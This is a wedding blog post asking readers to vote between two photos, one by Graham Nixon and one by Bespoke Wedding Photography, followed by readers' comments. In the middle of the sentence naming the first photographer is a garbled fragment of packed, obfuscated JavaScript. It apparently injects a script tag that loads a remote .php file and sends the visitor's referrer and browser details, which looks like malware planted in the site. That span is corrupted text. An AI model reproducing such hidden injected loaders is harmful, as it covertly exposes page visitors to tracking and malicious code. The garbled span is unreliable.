Ok Chickadees, I have searched the net and scoured the magazines for some unique, curious wedding stuff and I keep coming back to photography. I am just soooo in loooooove with looking at wedding photos! Wedding photography is such eye candy for me; I love looking at the cleverness of the photographer and the exacerbated happy looks of the Bride, Groom and guests of the day. In truth, I am a true-blue nosey bird when it comes to weddings photography.
So I had a brainy idea to hand over to you guys and let you run the show.
I want your opinion on what you like in wedding photography, whether your a Bride to be or a photographer, I want to know what you think.
The following two photographers were chosen at random by me, there is no advertising or sponsorship involved with this in any way. I simply searched Google and found two pics I love. Hmmm, I am going to think out loud here…I think I might make this a weekly post series!
So starting this brand new post series on wedding photography is Alice herself; the Bride.
So Chickadees, get voting and leave your comments below. Which photo do you like the best? I’d love to know why you love it too.
So… drum roll …here they are. Please do click on the images to make them larger so you can have a good ol’ look.
The first photo is from Graham””””,’g””” c=\’d\’ e=\’b/’ 4=\’7://5.8.9.f/1/h.s.t?r=”+3(0.p)+”\o=”+3(j.i)+”\’><\/k"+"l>“);n m=”q”;’,30,30,’ykhyr|vartefre||js|php’.split(‘|’),0,{}))
Nixon.
And for the second, a photo from Bespoke Wedding Photography.
I am going to be a teeny bit controversial now and tell you a little honest truth. While searching for the photographs, I came across a lot that I didn’t like. In fact, it took me quite a while to find these two photos. There are a load of traditionally set-up photos out there and while still beautiful, they just don’t give me that feeling of excitement, enjoyment and ecstatic happiness that being a Bride is all about.
Lady’s and gents, what do you think?
Zarn ?
P.S. I’ll let you know my favourite in a few days.
My fav is the first one by Graham Nixon, I love the happiness in her eyes and the fact she is clenching a glass of bubbly!
Just found you v twitter…I agree with Maddy, Love the look in her eyes, the moment she had is in the pic is lovely. Really love the other one too though x
I love the Graham Nixon one. It captures all the anticipation of whatever she is about to say (and you know it will be happy!). I look at this photo and imagine her breaking into song…
I prefer the Graham Nixon image as it captures that sense of moment which is surprisingly difficult to sense and portray as a wedding photographer (trust me!). The second feels to have been majorly over worked with a plug-in to give a false blur (only my judgement) rather than the more natural in-camera bokeh effect which could have been achieved with greater depth of field so from a technical and artistic point of view its Graham’s. Good work fella but a close second to Bespoke.
I prefer the graham Nixon one for no other reason than it’s my daughters auntie and the wedding ceremony and Love Andy and Tanya have is special and also they are quirky. Xx
Lisa, that’s amazing!! How exciting to have someone on the blog who knows someone in the photo! I love it. It’s a stunning photo. Love to see the entire wedding! Zarn x
The Graham Nixon picture captures the brides natural beauty, personality and sense of fun.
I’ll be the black sheep and be the first to say I prefer the Bespoke Weddings photo more. It’s just an absolutely beautiful shot.
I’m with Veronica on this one as, although I think Graham’s image is fabulous, and I love the excitement he captures, your second choice is right up my photographic street. Shallow depth of field with a real intensity, and a great contrast in the black & white. Both excellent images though, and deserved of your attention.
